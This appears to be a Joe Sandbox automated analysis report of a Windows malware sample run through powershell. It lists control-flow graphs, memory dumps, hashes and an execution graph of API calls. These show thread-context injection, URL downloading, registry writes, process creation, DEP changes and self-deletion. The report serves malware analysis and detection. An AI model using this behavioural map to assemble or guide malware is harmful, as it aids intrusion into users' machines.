                                                                                                                  control_flow_graph 1352 cacc78-caccc0 1355 cacccc-caccf8 Wow64SetThreadContext 1352->1355 1356 caccc2-caccca 1352->1356 1357 caccfa-cacd00 1355->1357 1358 cacd01-cacd22 1355->1358 1356->1355 1357->1358
                                                                                                                  APIs
                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,195035B0,?,?,00CAC05A), ref: 00CACCEB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024462818.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ca0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 983334009-0
                                                                                                                  • Opcode ID: 2dc4c133638febcdf2dd65af03df9048e10ba549190fa9ce7f39ca02e2886798
                                                                                                                  • Instruction ID: d9f254c13f38d83a9d6e43383c5831e8b0b0d33ea21db6b78be273b18dfab836
                                                                                                                  • Opcode Fuzzy Hash: 2dc4c133638febcdf2dd65af03df9048e10ba549190fa9ce7f39ca02e2886798
                                                                                                                  • Instruction Fuzzy Hash: 4C113AB2D1034A8FDB10CF9AC884BDEFBF5EB89324F148529D428A3640D7789545CF65

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1360 71d1ef9-71d1f3a 1362 71d20b7-71d20d8 1360->1362 1363 71d1f40-71d1f45 1360->1363 1370 71d20da-71d2102 1362->1370 1371 71d2105-71d210d 1362->1371 1364 71d1f5d-71d1f69 1363->1364 1365 71d1f47-71d1f4d 1363->1365 1372 71d1f6f-71d1f72 1364->1372 1373 71d2062-71d206c 1364->1373 1366 71d1f4f 1365->1366 1367 71d1f51-71d1f5b 1365->1367 1366->1364 1367->1364 1370->1371 1375 71d225d-71d22a2 1370->1375 1376 71d210f-71d2115 1371->1376 1377 71d2125-71d2129 1371->1377 1372->1373 1380 71d1f78-71d1f7f 1372->1380 1383 71d206e-71d2077 1373->1383 1384 71d207a-71d2080 1373->1384 1398 71d244c-71d247c 1375->1398 1399 71d22a8-71d22ad 1375->1399 1378 71d2119-71d2123 1376->1378 1379 71d2117 1376->1379 1381 71d212f-71d2133 1377->1381 1382 71d2208-71d2212 1377->1382 1378->1377 1379->1377 1380->1362 1387 71d1f85-71d1f8a 1380->1387 1388 71d2135-71d2146 1381->1388 1389 71d2173 1381->1389 1391 71d2214-71d221d 1382->1391 1392 71d2220-71d2226 1382->1392 1385 71d2086-71d2092 1384->1385 1386 71d2082-71d2084 1384->1386 1394 71d2094-71d20b4 1385->1394 1386->1394 1396 71d1f8c-71d1f92 1387->1396 1397 71d1fa2-71d1fa6 1387->1397 1388->1375 1414 71d214c-71d2151 1388->1414 1393 71d2175-71d2177 1389->1393 1400 71d222c-71d2238 1392->1400 1401 71d2228-71d222a 1392->1401 1393->1382 1403 71d217d-71d2181 1393->1403 1405 71d1f94 1396->1405 1406 71d1f96-71d1fa0 1396->1406 1397->1373 1410 71d1fac-71d1fb0 1397->1410 1425 71d247e-71d249b 1398->1425 1426 71d24b5-71d24bf 1398->1426 1408 71d22af-71d22b5 1399->1408 1409 71d22c5-71d22c9 1399->1409 1402 71d223a-71d225a 1400->1402 1401->1402 1403->1382 1412 71d2187-71d2196 1403->1412 1405->1397 1406->1397 1415 71d22b9-71d22c3 1408->1415 1416 71d22b7 1408->1416 1417 71d22cf-71d22d3 1409->1417 1418 71d23f4-71d23fe 1409->1418 1420 71d1fd0 1410->1420 1421 71d1fb2-71d1fce 1410->1421 1446 71d21ae-71d2205 1412->1446 1447 71d2198-71d219e 1412->1447 1429 71d2169-71d2171 1414->1429 1430 71d2153-71d2159 1414->1430 1415->1409 1416->1409 1423 71d22d5-71d22e6 1417->1423 1424 71d2313 1417->1424 1431 71d240c-71d2412 1418->1431 1432 71d2400-71d2409 1418->1432 1427 71d1fd2-71d1fd4 1420->1427 1421->1427 1423->1398 1458 71d22ec-71d22f1 1423->1458 1437 71d2315-71d2317 1424->1437 1459 71d249d-71d24af 1425->1459 1460 71d2505-71d250a 1425->1460 1439 71d24c8-71d24ce 1426->1439 1440 71d24c1-71d24c5 1426->1440 1427->1373 1441 71d1fda-71d1fdd 1427->1441 1429->1393 1442 71d215d-71d2167 1430->1442 1443 71d215b 1430->1443 1433 71d2418-71d2424 1431->1433 1434 71d2414-71d2416 1431->1434 1445 71d2426-71d2449 1433->1445 1434->1445 1437->1418 1450 71d231d-71d2321 1437->1450 1451 71d24d4-71d24e0 1439->1451 1452 71d24d0-71d24d2 1439->1452 1464 71d1fe7 1441->1464 1442->1429 1443->1429 1455 71d21a0 1447->1455 1456 71d21a2-71d21a4 1447->1456 1450->1418 1462 71d2327-71d232b 1450->1462 1463 71d24e2-71d2502 1451->1463 1452->1463 1455->1446 1456->1446 1467 71d2309-71d2311 1458->1467 1468 71d22f3-71d22f9 1458->1468 1459->1426 1460->1459 1462->1418 1469 71d2331-71d2357 1462->1469 1473 71d1fee-71d1ff0 1464->1473 1467->1437 1471 71d22fd-71d2307 1468->1471 1472 71d22fb 1468->1472 1469->1418 1486 71d235d-71d2361 1469->1486 1471->1467 1472->1467 1478 71d2008-71d205f 1473->1478 1479 71d1ff2-71d1ff8 1473->1479 1481 71d1ffc-71d1ffe 1479->1481 1482 71d1ffa 1479->1482 1481->1478 1482->1478 1487 71d2384 1486->1487 1488 71d2363-71d236c 1486->1488 1489 71d2387-71d2394 1487->1489 1490 71d236e-71d2371 1488->1490 1491 71d2373-71d2380 1488->1491 1493 71d239a-71d23f1 1489->1493 1492 71d2382 1490->1492 1491->1492 1492->1489
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2068080135.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_71d0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q
                                                                                                                  • API String ID: 0-1614139903
                                                                                                                  • Opcode ID: 51f684fc62d2c704442e67514d99818671b5cf0b9fa8a25013318d2588c1f126
                                                                                                                  • Instruction ID: 9c392c6073c5dbcb653c35aa8ffda641047b338063cf2893901a06ec8f85d46f
                                                                                                                  • Opcode Fuzzy Hash: 51f684fc62d2c704442e67514d99818671b5cf0b9fa8a25013318d2588c1f126
                                                                                                                  • Instruction Fuzzy Hash: D231B6F1A0530ADFDB25DF29C444BAA7BE1BF45311F1A80A6D1588B291D735DC88CF91
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2068080135.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_71d0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: (o^q
                                                                                                                  • API String ID: 0-74704288
                                                                                                                  • Opcode ID: f4cc534e134a6843dbb16a94f6fa32d8f414e14ea03a999ad561ee6750230179
                                                                                                                  • Instruction ID: 7a4a97ec80e504ef979104facc961af7d5d13ce985426814985b002506b02762
                                                                                                                  • Opcode Fuzzy Hash: f4cc534e134a6843dbb16a94f6fa32d8f414e14ea03a999ad561ee6750230179
                                                                                                                  • Instruction Fuzzy Hash: D131A0B0A0020AEFDB29CE19C944BAA77B1FF49310F158165E5358B1D0D7B1DC94CF91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024094709.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_a1d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5e922cec7176829c06a88b268aa0534bdeab1bee0b48ead2b2687fc8d844b9da
                                                                                                                  • Instruction ID: ba7f609bd1fa5fad77fb1773d906edcda55ce8ee0910179a09ad3dec447d7cf3
                                                                                                                  • Opcode Fuzzy Hash: 5e922cec7176829c06a88b268aa0534bdeab1bee0b48ead2b2687fc8d844b9da
                                                                                                                  • Instruction Fuzzy Hash: 80012B714043409AE7104B29CCC4BA7BFE8DF59325F18C429ED4A0B242C7789881C7B1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024094709.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_a1d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 35e1f7bfb09d27be882a04a9f58e1129be3e696a55aaac2f2c289a71c9996f48
                                                                                                                  • Instruction ID: 9376d9a7e9918ece4dafe58c2b639ce6b5213bfa2b2ba1973efd91db92859761
                                                                                                                  • Opcode Fuzzy Hash: 35e1f7bfb09d27be882a04a9f58e1129be3e696a55aaac2f2c289a71c9996f48
                                                                                                                  • Instruction Fuzzy Hash: 7001527140E3C09FD7128B258C94B52BFB4DF56225F1980DBD9898F193C2695844C772
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2068080135.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_71d0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                  • API String ID: 0-2049395529
                                                                                                                  • Opcode ID: 554e56b207d06b2486f847f08c7ce318334faf0c35dcfd9302918e5721b03d10
                                                                                                                  • Instruction ID: f5b9a5d9e513d4170d6db0f3742effbe859340586ccc86fe7a322e30e72bdd3b
                                                                                                                  • Opcode Fuzzy Hash: 554e56b207d06b2486f847f08c7ce318334faf0c35dcfd9302918e5721b03d10
                                                                                                                  • Instruction Fuzzy Hash: CC0126A1B0A3854FC72B026C1C245A66FB20BCBA11B1A40DBE140DF2DBCE144D86C7B7

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:4.6%
                                                                                                                  Dynamic/Decrypted Code Coverage:4.4%
                                                                                                                  Signature Coverage:6.2%
                                                                                                                  Total number of Nodes:1605
                                                                                                                  Total number of Limit Nodes:57
                                                                                                                  execution_graph 51419 41d4e0 51420 41d4f6 ctype ___scrt_fastfail 51419->51420 51422 431fa9 21 API calls 51420->51422 51434 41d6f3 51420->51434 51426 41d6a6 ___scrt_fastfail 51422->51426 51423 41d704 51424 41d744 51423->51424 51432 41d770 51423->51432 51436 431fa9 51423->51436 51426->51424 51429 431fa9 21 API calls 51426->51429 51428 41d73d ___scrt_fastfail 51428->51424 51441 43265f 51428->51441 51430 41d6ce ___scrt_fastfail 51429->51430 51430->51424 51433 431fa9 21 API calls 51430->51433 51432->51424 51444 41d484 21 API calls ___scrt_fastfail 51432->51444 51433->51434 51434->51424 51435 41d081 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 51434->51435 51435->51423 51437 431fb3 51436->51437 51438 431fb7 51436->51438 51437->51428 51445 43a89c 51438->51445 51454 43257f 51441->51454 51443 432667 51443->51432 51444->51424 51450 446b0f _strftime 51445->51450 51446 446b4d 51453 445364 20 API calls __dosmaperr 51446->51453 51447 446b38 RtlAllocateHeap 51449 431fbc 51447->51449 51447->51450 51449->51428 51450->51446 51450->51447 51452 442210 7 API calls 2 library calls 51450->51452 51452->51450 51453->51449 51455 432598 51454->51455 51459 43258e 51454->51459 51456 431fa9 21 API calls 51455->51456 51455->51459 51457 4325b9 51456->51457 51457->51459 51460 43294a CryptAcquireContextA 51457->51460 51459->51443 51461 43296b CryptGenRandom 51460->51461 51462 432966 51460->51462 51461->51462 51463 432980 CryptReleaseContext 51461->51463 51462->51459 51463->51462 51464 426040 51469 426107 recv 51464->51469 51470 4260a1 51475 42611e send 51470->51475 51476 425e66 51477 425e7b 51476->51477 51484 425f1b 51476->51484 51478 425f6a 51477->51478 51481 425ec9 51477->51481 51482 425efe 51477->51482 51477->51484 51486 425f35 51477->51486 51489 425fae 51477->51489 51491 425f87 51477->51491 51504 424364 48 API calls ctype 51477->51504 51478->51491 51508 424b8b 21 API calls 51478->51508 51481->51482 51481->51484 51505 41f085 52 API calls 51481->51505 51482->51484 51482->51486 51506 424364 48 API calls ctype 51482->51506 51486->51478 51486->51484 51507 41f085 52 API calls 51486->51507 51489->51484 51509 4255d7 28 API calls 51489->51509 51491->51484 51491->51489 51492 424f88 51491->51492 51493 424fa7 ___scrt_fastfail 51492->51493 51495 424fb6 51493->51495 51499 424fdb 51493->51499 51510 41e0a7 21 API calls 51493->51510 51495->51499 51503 424fbb 51495->51503 51511 41fae4 45 API calls 51495->51511 51498 424fc4 51498->51499 51513 424195 21 API calls 2 library calls 51498->51513 51499->51489 51501 42505e 51501->51499 51502 431fa9 21 API calls 51501->51502 51502->51503 51503->51498 51503->51499 51512 41cf7e 48 API calls 51503->51512 51504->51481 51505->51481 51506->51486 51507->51486 51508->51491 51509->51484 51510->51495 51511->51501 51512->51498 51513->51499 51514 1000c7a7 51515 1000c7be 51514->51515 51520 1000c82c 51514->51520 51515->51520 51526 1000c7e6 GetModuleHandleA 51515->51526 51516 1000c872 51517 1000c835 GetModuleHandleA 51521 1000c83f 51517->51521 51519 1000c7dd 51519->51520 51519->51521 51523 1000c800 GetProcAddress 51519->51523 51520->51516 51520->51517 51520->51521 51521->51520 51522 1000c85f GetProcAddress 51521->51522 51522->51520 51523->51520 51524 1000c80d VirtualProtect 51523->51524 51524->51520 51525 1000c81c VirtualProtect 51524->51525 51525->51520 51527 1000c7ef 51526->51527 51533 1000c82c 51526->51533 51538 1000c803 GetProcAddress 51527->51538 51529 1000c872 51530 1000c835 GetModuleHandleA 51535 1000c83f 51530->51535 51531 1000c7f4 51532 1000c800 GetProcAddress 51531->51532 51531->51533 51532->51533 51534 1000c80d VirtualProtect 51532->51534 51533->51529 51533->51530 51533->51535 51534->51533 51536 1000c81c VirtualProtect 51534->51536 51535->51533 51537 1000c85f GetProcAddress 51535->51537 51536->51533 51537->51533 51539 1000c82c 51538->51539 51540 1000c80d VirtualProtect 51538->51540 51542 1000c872 51539->51542 51543 1000c835 GetModuleHandleA 51539->51543 51540->51539 51541 1000c81c VirtualProtect 51540->51541 51541->51539 51545 1000c83f 51543->51545 51544 1000c85f GetProcAddress 51544->51545 51545->51539 51545->51544 51546 43a9a8 51548 43a9b4 _swprintf __FrameHandler3::FrameUnwindToState 51546->51548 51547 43a9c2 51562 445364 20 API calls __dosmaperr 51547->51562 51548->51547 51550 43a9ec 51548->51550 51557 444adc EnterCriticalSection 51550->51557 51552 43a9c7 __fread_nolock __cftof 51553 43a9f7 51558 43aa98 51553->51558 51557->51553 51560 43aaa6 51558->51560 51559 43aa02 51563 43aa1f LeaveCriticalSection std::_Lockit::~_Lockit 51559->51563 51560->51559 51564 448426 36 API calls 2 library calls 51560->51564 51562->51552 51563->51552 51564->51560 51565 414dba 51580 41a52b 51565->51580 51567 414dc3 51590 401fbd 51567->51590 51572 4161f2 51613 401d8c 51572->51613 51575 4161fb 51576 401eea 11 API calls 51575->51576 51577 416207 51576->51577 51578 401eea 11 API calls 51577->51578 51579 416213 51578->51579 51581 41a539 51580->51581 51582 43a89c ___crtLCMapStringA 21 API calls 51581->51582 51583 41a543 InternetOpenW InternetOpenUrlW 51582->51583 51584 41a56c InternetReadFile 51583->51584 51588 41a58f 51584->51588 51585 41a5bc InternetCloseHandle InternetCloseHandle 51587 41a5ce 51585->51587 51587->51567 51588->51584 51588->51585 51589 401eea 11 API calls 51588->51589 51619 401f86 51588->51619 51589->51588 51591 401fcc 51590->51591 51628 402501 51591->51628 51593 401fea 51594 404468 51593->51594 51595 40447b 51594->51595 51633 404be8 51595->51633 51597 404490 ctype 51598 404507 WaitForSingleObject 51597->51598 51599 4044e7 51597->51599 51601 40451d 51598->51601 51600 4044f9 send 51599->51600 51603 404542 51600->51603 51637 42052a 54 API calls 51601->51637 51605 401eea 11 API calls 51603->51605 51604 404530 SetEvent 51604->51603 51606 40454a 51605->51606 51607 401eea 11 API calls 51606->51607 51608 404552 51607->51608 51608->51572 51609 401eea 51608->51609 51610 4021b9 51609->51610 51611 4021e8 51610->51611 51643 40262e 51610->51643 51611->51572 51614 40200a 51613->51614 51618 40203a 51614->51618 51651 402654 51614->51651 51616 40202b 51654 4026ba 11 API calls _Deallocate 51616->51654 51618->51575 51620 401f8e 51619->51620 51623 402325 51620->51623 51622 401fa4 51622->51588 51624 40232f 51623->51624 51626 40233a 51624->51626 51627 40294a 28 API calls 51624->51627 51626->51622 51627->51626 51629 40250d 51628->51629 51630 40252b 51629->51630 51632 40261a 28 API calls 51629->51632 51630->51593 51632->51630 51634 404bf0 51633->51634 51638 404c0c 51634->51638 51636 404c06 51636->51597 51637->51604 51639 404c16 51638->51639 51641 404c21 51639->51641 51642 404d07 28 API calls 51639->51642 51641->51636 51642->51641 51646 402bee 51643->51646 51645 40263b 51645->51611 51647 402bfb 51646->51647 51648 402c08 error_info_injector 51646->51648 51650 4015d8 11 API calls _Deallocate 51647->51650 51648->51645 51650->51648 51655 402c1a 51651->51655 51654->51618 51658 403340 51655->51658 51660 403348 51658->51660 51659 402662 51659->51616 51660->51659 51662 4038c2 51660->51662 51665 4038cb 51662->51665 51666 401eea 11 API calls 51665->51666 51667 4038ca 51666->51667 51667->51660 51668 42ea2e 51669 42ea39 51668->51669 51670 42ea4d 51669->51670 51672 431fd3 51669->51672 51673 431fe2 51672->51673 51674 431fde 51672->51674 51676 43fcea 51673->51676 51674->51670 51677 44b9ce 51676->51677 51678 44b9e6 51677->51678 51679 44b9db 51677->51679 51681 44b9ee 51678->51681 51687 44b9f7 _strftime 51678->51687 51695 446b0f 21 API calls 3 library calls 51679->51695 51689 446ad5 51681->51689 51683 44ba21 RtlReAllocateHeap 51685 44b9e3 51683->51685 51683->51687 51684 44b9fc 51696 445364 20 API calls __dosmaperr 51684->51696 51685->51674 51687->51683 51687->51684 51697 442210 7 API calls 2 library calls 51687->51697 51690 446ae0 RtlFreeHeap 51689->51690 51694 446b09 __dosmaperr 51689->51694 51691 446af5 51690->51691 51690->51694 51698 445364 20 API calls __dosmaperr 51691->51698 51693 446afb GetLastError 51693->51694 51694->51685 51695->51685 51696->51685 51697->51687 51698->51693 51699 402bcc 51700 402bd7 51699->51700 51701 402bdf 51699->51701 51707 403315 51700->51707 51703 402beb 51701->51703 51714 4015d3 51701->51714 51708 4015d3 22 API calls 51707->51708 51709 40332a 51708->51709 51710 402bdd 51709->51710 51711 40333b 51709->51711 51724 43a864 11 API calls _abort 51711->51724 51713 43a863 51716 43361d 51714->51716 51715 43a89c ___crtLCMapStringA 21 API calls 51715->51716 51716->51715 51717 402be9 51716->51717 51720 43363e std::_Facet_Register 51716->51720 51725 442210 7 API calls 2 library calls 51716->51725 51719 433dfc std::_Facet_Register 51727 437be7 RaiseException 51719->51727 51720->51719 51726 437be7 RaiseException 51720->51726 51723 433e19 51724->51713 51725->51716 51726->51719 51727->51723 51728 4339ce 51729 4339da __FrameHandler3::FrameUnwindToState 51728->51729 51760 4336c3 51729->51760 51731 4339e1 51732 433b34 51731->51732 51735 433a0b 51731->51735 52060 433b54 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 51732->52060 51734 433b3b 52061 4426ce 28 API calls _abort 51734->52061 51745 433a4a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 51735->51745 52054 4434e1 5 API calls _ValidateLocalCookies 51735->52054 51737 433b41 52062 442680 28 API calls _abort 51737->52062 51740 433b49 51741 433a24 51742 433a2a 51741->51742 52055 443485 5 API calls _ValidateLocalCookies 51741->52055 51744 433aab 51771 433c6e 51744->51771 51745->51744 52056 43ee04 35 API calls 3 library calls 51745->52056 51754 433acd 51754->51734 51755 433ad1 51754->51755 51756 433ada 51755->51756 52058 442671 28 API calls _abort 51755->52058 52059 433852 13 API calls 2 library calls 51756->52059 51759 433ae2 51759->51742 51761 4336cc 51760->51761 52063 433e1a IsProcessorFeaturePresent 51761->52063 51763 4336d8 52064 4379fe 10 API calls 3 library calls 51763->52064 51765 4336e1 51765->51731 51766 4336dd 51766->51765 52065 44336e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 51766->52065 51768 4336ea 51769 4336f8 51768->51769 52066 437a27 8 API calls 3 library calls 51768->52066 51769->51731 52067 436060 51771->52067 51774 433ab1 51775 443432 51774->51775 52069 44ddd9 51775->52069 51777 44343b 51779 433aba 51777->51779 52073 44e0e3 35 API calls 51777->52073 51780 40d767 51779->51780 52075 41bcf3 LoadLibraryA GetProcAddress 51780->52075 51782 40d783 GetModuleFileNameW 52080 40e168 51782->52080 51784 40d79f 51785 401fbd 28 API calls 51784->51785 51786 40d7ae 51785->51786 51787 401fbd 28 API calls 51786->51787 51788 40d7bd 51787->51788 52095 41afd3 51788->52095 51792 40d7cf 51793 401d8c 11 API calls 51792->51793 51794 40d7d8 51793->51794 51795 40d835 51794->51795 51796 40d7eb 51794->51796 52120 401d64 51795->52120 52364 40e986 90 API calls 51796->52364 51799 40d845 51802 401d64 28 API calls 51799->51802 51800 40d7fd 51801 401d64 28 API calls 51800->51801 51804 40d809 51801->51804 51803 40d864 51802->51803 52125 404cbf 51803->52125 52365 40e937 65 API calls 51804->52365 51806 40d873 52129 405ce6 51806->52129 51809 40d87f 52132 401eef 51809->52132 51810 40d824 52366 40e155 65 API calls 51810->52366 51813 40d88b 51814 401eea 11 API calls 51813->51814 51815 40d894 51814->51815 51817 401eea 11 API calls 51815->51817 51816 401eea 11 API calls 51818 40dc9f 51816->51818 51819 40d89d 51817->51819 52057 433ca4 GetModuleHandleW 51818->52057 51820 401d64 28 API calls 51819->51820 51821 40d8a6 51820->51821 52136 401ebd 51821->52136 51823 40d8b1 51824 401d64 28 API calls 51823->51824 51825 40d8ca 51824->51825 51826 401d64 28 API calls 51825->51826 51828 40d8e5 51826->51828 51827 40d946 51829 401d64 28 API calls 51827->51829 51844 40e134 51827->51844 51828->51827 52367 4085b4 51828->52367 51835 40d95d 51829->51835 51831 40d912 51832 401eef 11 API calls 51831->51832 51833 40d91e 51832->51833 51836 401eea 11 API calls 51833->51836 51834 40d9a4 52140 40bed7 51834->52140 51835->51834 51841 4124b7 3 API calls 51835->51841 51838 40d927 51836->51838 52371 4124b7 RegOpenKeyExA 51838->52371 51839 40d9aa 51840 40d82d 51839->51840 52143 41a473 51839->52143 51840->51816 51846 40d988 51841->51846 52459 412902 30 API calls 51844->52459 51845 40d9c5 51847 40da18 51845->51847 52160 40697b 51845->52160 51846->51834 52374 412902 30 API calls 51846->52374 51850 401d64 28 API calls 51847->51850 51853 40da21 51850->51853 51852 40e14a 52460 4112b5 64 API calls ___scrt_fastfail 51852->52460 51861 40da32 51853->51861 51862 40da2d 51853->51862 51855 40d9e4 52375 40699d 30 API calls 51855->52375 51856 40d9ee 51860 401d64 28 API calls 51856->51860 51869 40d9f7 51860->51869 51866 401d64 28 API calls 51861->51866 52378 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 51862->52378 51863 40d9e9 52376 4064d0 97 API calls 51863->52376 51867 40da3b 51866->51867 52164 41ae18 51867->52164 51869->51847 51872 40da13 51869->51872 51870 40da46 52168 401e18 51870->52168 52377 4064d0 97 API calls 51872->52377 51873 40da51 52172 401e13 51873->52172 51876 40da5a 51877 401d64 28 API calls 51876->51877 51878 40da63 51877->51878 51879 401d64 28 API calls 51878->51879 51880 40da7d 51879->51880 51881 401d64 28 API calls 51880->51881 51882 40da97 51881->51882 51883 401d64 28 API calls 51882->51883 51885 40dab0 51883->51885 51884 40db1d 51886 40db2c 51884->51886 51893 40dcaa ___scrt_fastfail 51884->51893 51885->51884 51887 401d64 28 API calls 51885->51887 51888 40db35 51886->51888 51916 40dbb1 ___scrt_fastfail 51886->51916 51891 40dac5 _wcslen 51887->51891 51889 401d64 28 API calls 51888->51889 51890 40db3e 51889->51890 51892 401d64 28 API calls 51890->51892 51891->51884 51894 401d64 28 API calls 51891->51894 51895 40db50 51892->51895 52438 41265d RegOpenKeyExA 51893->52438 51896 40dae0 51894->51896 51898 401d64 28 API calls 51895->51898 51899 401d64 28 API calls 51896->51899 51900 40db62 51898->51900 51901 40daf5 51899->51901 51903 401d64 28 API calls 51900->51903 52379 40c89e 51901->52379 51902 40dcef 51904 401d64 28 API calls 51902->51904 51905 40db8b 51903->51905 51906 40dd16 51904->51906 51911 401d64 28 API calls 51905->51911 52186 401f66 51906->52186 51909 401e18 11 API calls 51910 40db14 51909->51910 51913 401e13 11 API calls 51910->51913 51914 40db9c 51911->51914 51913->51884 52436 40bc67 46 API calls _wcslen 51914->52436 51915 40dd25 52190 4126d2 RegCreateKeyA 51915->52190 52176 4128a2 51916->52176 51920 40dc45 ctype 51925 401d64 28 API calls 51920->51925 51921 40dbac 51921->51916 51923 401d64 28 API calls 51924 40dd47 51923->51924 52196 43a5f7 51924->52196 51926 40dc5c 51925->51926 51926->51902 51930 40dc70 51926->51930 51929 40dd5e 52441 41bec0 87 API calls ___scrt_fastfail 51929->52441 51932 401d64 28 API calls 51930->51932 51931 40dd81 51936 401f66 28 API calls 51931->51936 51934 40dc7e 51932->51934 51937 41ae18 28 API calls 51934->51937 51935 40dd65 CreateThread 51935->51931 53337 41c97f 10 API calls 51935->53337 51939 40dd96 51936->51939 51938 40dc87 51937->51938 52437 40e219 119 API calls 51938->52437 51940 401f66 28 API calls 51939->51940 51942 40dda5 51940->51942 52200 41a696 51942->52200 51943 40dc8c 51943->51902 51945 40dc93 51943->51945 51945->51840 51947 401d64 28 API calls 51948 40ddb6 51947->51948 51949 401d64 28 API calls 51948->51949 51950 40ddcb 51949->51950 51951 401d64 28 API calls 51950->51951 51952 40ddeb 51951->51952 51953 43a5f7 39 API calls 51952->51953 51954 40ddf8 51953->51954 51955 401d64 28 API calls 51954->51955 51956 40de03 51955->51956 51957 401d64 28 API calls 51956->51957 51958 40de14 51957->51958 51959 401d64 28 API calls 51958->51959 51960 40de29 51959->51960 51961 401d64 28 API calls 51960->51961 51962 40de3a 51961->51962 51963 40de41 StrToIntA 51962->51963 52224 409517 51963->52224 51966 401d64 28 API calls 51967 40de5c 51966->51967 51968 40dea1 51967->51968 51969 40de68 51967->51969 51971 401d64 28 API calls 51968->51971 52442 43361d 22 API calls 3 library calls 51969->52442 51973 40deb1 51971->51973 51972 40de71 51974 401d64 28 API calls 51972->51974 51976 40def9 51973->51976 51977 40debd 51973->51977 51975 40de84 51974->51975 51978 40de8b CreateThread 51975->51978 51980 401d64 28 API calls 51976->51980 52443 43361d 22 API calls 3 library calls 51977->52443 51978->51968 53335 419138 112 API calls __EH_prolog 51978->53335 51982 40df02 51980->51982 51981 40dec6 51983 401d64 28 API calls 51981->51983 51985 40df6c 51982->51985 51986 40df0e 51982->51986 51984 40ded8 51983->51984 51989 40dedf CreateThread 51984->51989 51987 401d64 28 API calls 51985->51987 51988 401d64 28 API calls 51986->51988 51990 40df75 51987->51990 51991 40df1e 51988->51991 51989->51976 53334 419138 112 API calls __EH_prolog 51989->53334 51992 40df81 51990->51992 51993 40dfba 51990->51993 51994 401d64 28 API calls 51991->51994 51996 401d64 28 API calls 51992->51996 52249 41a7b2 GetComputerNameExW GetUserNameW 51993->52249 51997 40df33 51994->51997 51999 40df8a 51996->51999 52444 40c854 51997->52444 52004 401d64 28 API calls 51999->52004 52000 401e18 11 API calls 52001 40dfce 52000->52001 52003 401e13 11 API calls 52001->52003 52006 40dfd7 52003->52006 52007 40df9f 52004->52007 52009 40dfe0 SetProcessDEPPolicy 52006->52009 52010 40dfe3 CreateThread 52006->52010 52017 43a5f7 39 API calls 52007->52017 52008 401e18 11 API calls 52011 40df52 52008->52011 52009->52010 52012 40e004 52010->52012 52013 40dff8 CreateThread 52010->52013 53305 40e54f 52010->53305 52014 401e13 11 API calls 52011->52014 52015 40e019 52012->52015 52016 40e00d CreateThread 52012->52016 52013->52012 53336 410f36 146 API calls 52013->53336 52018 40df5b CreateThread 52014->52018 52021 40e073 52015->52021 52022 401f66 28 API calls 52015->52022 52016->52015 53332 411524 38 API calls ___scrt_fastfail 52016->53332 52019 40dfac 52017->52019 52018->51985 53333 40196b 49 API calls 52018->53333 52455 40b95c 7 API calls 52019->52455 52260 41246e RegOpenKeyExA 52021->52260 52023 40e046 52022->52023 52456 404c9e 28 API calls 52023->52456 52026 40e053 52029 401f66 28 API calls 52026->52029 52028 40e12a 52272 40cbac 52028->52272 52031 40e062 52029->52031 52030 41ae18 28 API calls 52033 40e0a4 52030->52033 52034 41a696 79 API calls 52031->52034 52263 412584 RegOpenKeyExW 52033->52263 52036 40e067 52034->52036 52038 401eea 11 API calls 52036->52038 52038->52021 52041 401e13 11 API calls 52044 40e0c5 52041->52044 52042 40e0ed DeleteFileW 52043 40e0f4 52042->52043 52042->52044 52045 41ae18 28 API calls 52043->52045 52044->52042 52044->52043 52046 40e0db Sleep 52044->52046 52047 40e104 52045->52047 